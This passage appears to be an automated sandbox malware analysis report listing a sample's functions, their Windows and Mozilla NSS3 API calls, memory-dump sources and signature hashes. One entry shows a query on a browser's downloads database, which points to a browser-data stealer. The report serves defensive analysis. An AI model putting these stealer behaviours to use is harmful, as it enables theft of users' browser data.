                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                          • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                          • API String ID: 2500673778-2241552939
                                                                                                                                                                                          • Opcode ID: bf413405b0ae6e602a63012df139c79fa556f509f7a1d7cc45c78dbf4b273b9c
                                                                                                                                                                                          • Instruction ID: 626b8f5326a002b7fe208c17e239a4de3d9d9599f48a00cbe29dbd0ea3c0d762
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf413405b0ae6e602a63012df139c79fa556f509f7a1d7cc45c78dbf4b273b9c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E71C732904129EFCF02FBA4ED478DEB7B5AF04305F514160F904B7166DB60AE5A8BA1
                                                                                                                                                                                          Function 6C52EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C52EDFD
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6C52EE64
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C52EECC
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C52EEEB
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C52EEF6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3833505462-0
                                                                                                                                                                                          • Opcode ID: c09a2b51fa98ce747926ece11fb0f7c619284b941c3dd84ea98fb3bb73da54d7
                                                                                                                                                                                          • Instruction ID: 3fcf8df56e263968d2e62e98105abed0a277ce20b41ded1fb9c83e44462fdae7
                                                                                                                                                                                          • Opcode Fuzzy Hash: c09a2b51fa98ce747926ece11fb0f7c619284b941c3dd84ea98fb3bb73da54d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF310971600201ABDB20DF39CC84B667BF4FB46316F140629E85A87A90D779E814C7E5
                                                                                                                                                                                          Function 6C41B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 6C41B532
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(?), ref: 6C41B55B
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C41B56B
                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C41B57E
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C41B58F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4244350000-0
                                                                                                                                                                                          • Opcode ID: 2b8bb569065e6112a9124d306aabe7e1553e7b4ccc0eb69b7e96ddefeffa42a0
                                                                                                                                                                                          • Instruction ID: 52e094de2542b679f49ae9328b1bf518c1941bf931bec6e4ec150dafd3cd760f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8bb569065e6112a9124d306aabe7e1553e7b4ccc0eb69b7e96ddefeffa42a0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5021E4B1A042159BDB00DF69CC40FBABBB9FF85318F284129E958DB781E776D911C7A0
                                                                                                                                                                                          Function 6C53AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000,00000000), ref: 6C53ADA7
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000,00000000), ref: 6C53ADB4
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C533FFF,?,?,?,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000), ref: 6C53ADD5
                                                                                                                                                                                            • Part of subcall function 6C58FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C588D2D,?,00000000,?), ref: 6C58FB85
                                                                                                                                                                                            • Part of subcall function 6C58FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C58FBB1
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6594B0,?,?,?,?,?,?,?,?,6C533FFF,00000000,?), ref: 6C53ADEC
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C533FFF), ref: 6C53AE3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                          • Opcode ID: a69722281a64bfc8f8f6b638edda58da0040f29df28a473bc99ae962894bbfa7
                                                                                                                                                                                          • Instruction ID: d15ce0478b9d938cf2721ca94fce80cfcc9c79a4b58f3fc29982ad0038676bcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: a69722281a64bfc8f8f6b638edda58da0040f29df28a473bc99ae962894bbfa7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71112671E00324ABEB109AA59C41BBF73AC9F9524DF044628EC5996741FB20ED5886A2
                                                                                                                                                                                          Function 00045713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _freemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3576935931-0
                                                                                                                                                                                          • Opcode ID: 80ce73ea9ebf962f03b6d5c1ab388bf987affb9fed4bfc7c34003e58c73c223a
                                                                                                                                                                                          • Instruction ID: db45ad068461e4a55f1046390cad3ea681f00f6a6a045879d642a06dd6309979
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ce73ea9ebf962f03b6d5c1ab388bf987affb9fed4bfc7c34003e58c73c223a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211C4B2408E11EBDB317B78BC45A9E37D4AF443B2F204436F8499A153DA388990C699
                                                                                                                                                                                          Function 6C55CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C571E10: TlsGetValue.KERNEL32 ref: 6C571E36
                                                                                                                                                                                            • Part of subcall function 6C571E10: EnterCriticalSection.KERNEL32(?,?,?,6C54B1EE,2404110F,?,?), ref: 6C571E4B
                                                                                                                                                                                            • Part of subcall function 6C571E10: PR_Unlock.NSS3 ref: 6C571E76
                                                                                                                                                                                          • free.MOZGLUE(?,6C55D079,00000000,00000001), ref: 6C55CDA5
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C55D079,00000000,00000001), ref: 6C55CDB6
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C55D079,00000000,00000001), ref: 6C55CDCF
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C55D079,00000000,00000001), ref: 6C55CDE2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C55CDE9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                          • Opcode ID: 9e7fcee904b60357f2e8ad06adafa8d50115ae867fd631be6f8466cd6a173b06
                                                                                                                                                                                          • Instruction ID: d57a5650f08a52c6648f1992a11a27543f1f55ef915c0ca4c1231975296d60ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e7fcee904b60357f2e8ad06adafa8d50115ae867fd631be6f8466cd6a173b06
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36119EB2B01111BBEB00AB65EC84996B728FB48368B540222E919D6E01E732F874C7E1
                                                                                                                                                                                          Function 6C5C2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5C5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5C5B56
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C2CEC
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2D02
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2D1F
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2D42
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2D5B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                          • Instruction ID: 3f3f347d388e6310350a2431fa3402142f1db76409673084fb4f1d2fcb185151
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF01CCB5B006009BD7309E69FC44BC777A5EF95318F005929D85986710E732F816CB93
                                                                                                                                                                                          Function 6C5C2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C5C5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5C5B56
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C2D9C
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2DB2
                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C5C2DCF
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2DF2
                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C5C2E0B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                          • Instruction ID: e541d061d3570ad1c56d2b31c924fbd263883f8762cfb3e9e114e8130e5fe527
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D01CCB5B006009BD7309E69FC05BC777A5EF91318F001439E85996711E732F8168A93
                                                                                                                                                                                          Function 6C55AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C55AE42), ref: 6C5430AA
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5430C7
                                                                                                                                                                                            • Part of subcall function 6C543090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5430E5
                                                                                                                                                                                            • Part of subcall function 6C543090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C543116
                                                                                                                                                                                            • Part of subcall function 6C543090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C54312B
                                                                                                                                                                                            • Part of subcall function 6C543090: PK11_DestroyObject.NSS3(?,?), ref: 6C543154
                                                                                                                                                                                            • Part of subcall function 6C543090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C54317E
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5399FF,?,?,?,?,?,?,?,?,?,6C532D6B,?), ref: 6C55AE67
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5399FF,?,?,?,?,?,?,?,?,?,6C532D6B,?), ref: 6C55AE7E
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C532D6B,?,?,00000000), ref: 6C55AE89
                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C532D6B,?,?,00000000), ref: 6C55AE96
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C532D6B,?,?), ref: 6C55AEA3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                          • Opcode ID: 3ca1d691606e32f0af4b29a2ad0b6ce23c55c47247a8d9d8128620f271ee2e32
                                                                                                                                                                                          • Instruction ID: 53aeace17fafc9426dd83f475a46e22c2a9191f15658b6c00db40752fe1b0c74
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ca1d691606e32f0af4b29a2ad0b6ce23c55c47247a8d9d8128620f271ee2e32
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7801FFB2B0006097E702D26CAC85ABB31588BC765CF880833E90AD7B01F616DD2A43F3
                                                                                                                                                                                          Function 6C64ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C64A6D8), ref: 6C64AE0D
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C64AE14
                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C64A6D8), ref: 6C64AE36
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C64AE3D
                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C64A6D8), ref: 6C64AE47
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                          • Opcode ID: 1108bc9353b1ab3d509ea11b0b929ef135d07bd8999e0d4aba15bac789d9b8d1
                                                                                                                                                                                          • Instruction ID: 7ac516f51f917e9fa161f6fc9f99729602e6528837759ee6654c1583387ddffd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1108bc9353b1ab3d509ea11b0b929ef135d07bd8999e0d4aba15bac789d9b8d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF0C875102A02B7CB009F65E488D577778BE46774B104328E13B83941D736E016D7E9
                                                                                                                                                                                          Function 00046719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00046725
                                                                                                                                                                                            • Part of subcall function 00044954: __getptd_noexit.LIBCMT ref: 00044957
